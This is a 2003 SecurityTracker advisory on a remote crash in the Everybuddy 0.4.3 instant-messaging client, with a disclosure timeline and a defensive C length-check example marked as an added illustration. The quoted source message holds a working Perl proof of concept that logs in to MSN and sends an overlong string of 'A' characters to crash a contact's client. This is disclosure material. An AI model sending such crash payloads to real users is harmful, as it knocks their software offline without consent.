SecurityTracker.com
Category:   Application (Instant Messaging/IRC/Chat)  >   Everybuddy
Vendors:   everybuddy.com
Everybuddy Messaging Client Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1007416
SecurityTracker URL:  http://securitytracker.com/id/1007416
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Aug 5 2003
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 0.4.3
Description:   A denial of service vulnerability was reported in Everybuddy. A remote user can cause a target user's client to crash.

SecuriTeam reported that a remote user can send a specially crafted long message (of approximately 1540 characters) to a target user to cause the target user's client to crash.

Some demonstration exploit code is provided in the Source Message.

The following notification timeline is provided:

19/06/2003 - First attempt to contact vendor
20/06/2003 - First vendor response
22/06/2003 - PoC provided to vendor
01/07/2003 - Second attempt to contact vendor
01/08/2003 - Third attempt to contact vendor
05/08/2003 - Public advisory

Impact:   A remote user can cause a target user's Everybuddy client to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.everybuddy.com/en/index.php
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.
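
With the cause listed as a boundary error and no vendor fix available, the relevant control is a length check on the inbound message body before it is copied into any fixed-size buffer. The following is an added example, not Everybuddy code and not part of the advisory; the function name, result codes and the 1024-byte limit are assumptions chosen for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed policy limit for this example. The advisory gives no buffer size
 * for Everybuddy, only that a message of about 1540 characters crashes 0.4.3. */
#define IM_MAX_BODY 1024

enum im_result { IM_OK = 0, IM_TOO_LONG = -1, IM_BAD_ARG = -2 };

/* Hypothetical receive-path helper: store an inbound message body of src_len
 * bytes (length-delimited, not NUL-terminated) into dst. The length is
 * checked against the policy limit and the destination size before any byte
 * is copied; oversize input is rejected and dst is left as an empty string. */
enum im_result im_store_body(char *dst, size_t dst_size,
                             const char *src, size_t src_len)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return IM_BAD_ARG;
    dst[0] = '\0';
    if (src_len > IM_MAX_BODY || src_len >= dst_size)
        return IM_TOO_LONG;
    memcpy(dst, src, src_len);
    dst[src_len] = '\0';
    return IM_OK;
}

int main(void)
{
    char display[2048];
    char long_msg[1540];              /* constructed sample input */
    memset(long_msg, 'A', sizeof long_msg);

    enum im_result r = im_store_body(display, sizeof display,
                                     long_msg, sizeof long_msg);
    printf("1540-byte body: %s\n", r == IM_TOO_LONG ? "rejected" : "stored");

    r = im_store_body(display, sizeof display, "hello", 5);
    printf("5-byte body:    %s (\"%s\")\n",
           r == IM_OK ? "stored" : "rejected", display);
    return 0;
}
```

Rejecting rather than truncating keeps the decision visible to the caller, which can then log the sender and drop the message.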


 Source Message Contents

Subject:  [NEWS] Everybuddy Vulnerable to a DoS Attack (Long Message)


The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



  Everybuddy Vulnerable to a DoS Attack (Long Message)
------------------------------------------------------------------------


SUMMARY

Everybuddy <http://www.everybuddy.com/en/index.php> has support for AIM, 
ICQ, MSN, Yahoo! and Jabber chat programs. The program contains a security 
vulnerability that allows remote attackers to cause the program to crash 
by sending it an overly long message (instant message).

DETAILS

Vulnerable systems:
 * Everybuddy version 0.4.3

Exploit:
The exploit code will login as a user, wait for someone to talk to him, 
and send him the attack string.

#!/usr/bin/perl

use MSN; # from http://www.adamswann.com/library/2002/msn-perl/

my $client = MSN->new();
$client->connect('email address', 'password', '', {
    Status => \&Status,
    Answer => \&Answer,
    Message => \&Message,
    Join => \&Join }
);


sub Status {
   my ($self, $username, $newstatus) = @_;

   print "Status() called with parameters:\n";
   print " " . join(",", @_), "\n";

   # Print the status change info.
   print "${username}'s status changed from " .
      $self->buddystatus($username) . " to $newstatus.\n";

   # Initiate the call.
   $self->call($username);

   # The call may take a few seconds to complete, so we can't
   # immediately send messages. Let's put the message in a
   # FIFO (queue) that is keyed by username.
   push (@{$queue{$username}}, "Glad to see you online!");
}

sub Message {
   my ($self, $username, undef, $msg) = @_;

   print "Message() called with parameters:\n";
   print " " . join(",", @_), "\n";

}

sub Join {
   my ($self, $username) = @_;

   print "Join() called with parameters:\n";
   print " " . join(",", @_), "\n";

   # See if there's anything queued up.
   # Deliver each message if there is stuff in the queue for this user.
   while ($_ = shift @{$queue{$username}}) {
      $$self->sendmsg($_);
   }
}

sub Answer {
   my ($self, $username) = @_;

   print "Answer() called with parameters:\n";
   print " " . join(",", @_), "\n";

   # Send a hello message.
   $$self->sendmsg("AAAAAAAAAAAAAAAAAAAAAAAAAAA\r"x55);

}

Vendor status:
After numerous attempts to contact the vendor (in some cases the vendor 
replied, but then disappeared again), we are forced to release this 
information, without receiving a proper response from them.

Disclosure timeline:
19/06/2003 - First attempt to contact vendor
20/06/2003 - First vendor response
22/06/2003 - PoC provided to vendor
01/07/2003 - Second attempt to contact vendor
01/08/2003 - Third attempt to contact vendor
05/08/2003 - Public advisory


ADDITIONAL INFORMATION

The information has been provided by Noam Rathaus 
<noamr@beyondsecurity.com> and SecurITeam Experts <expert@securiteam.com>.


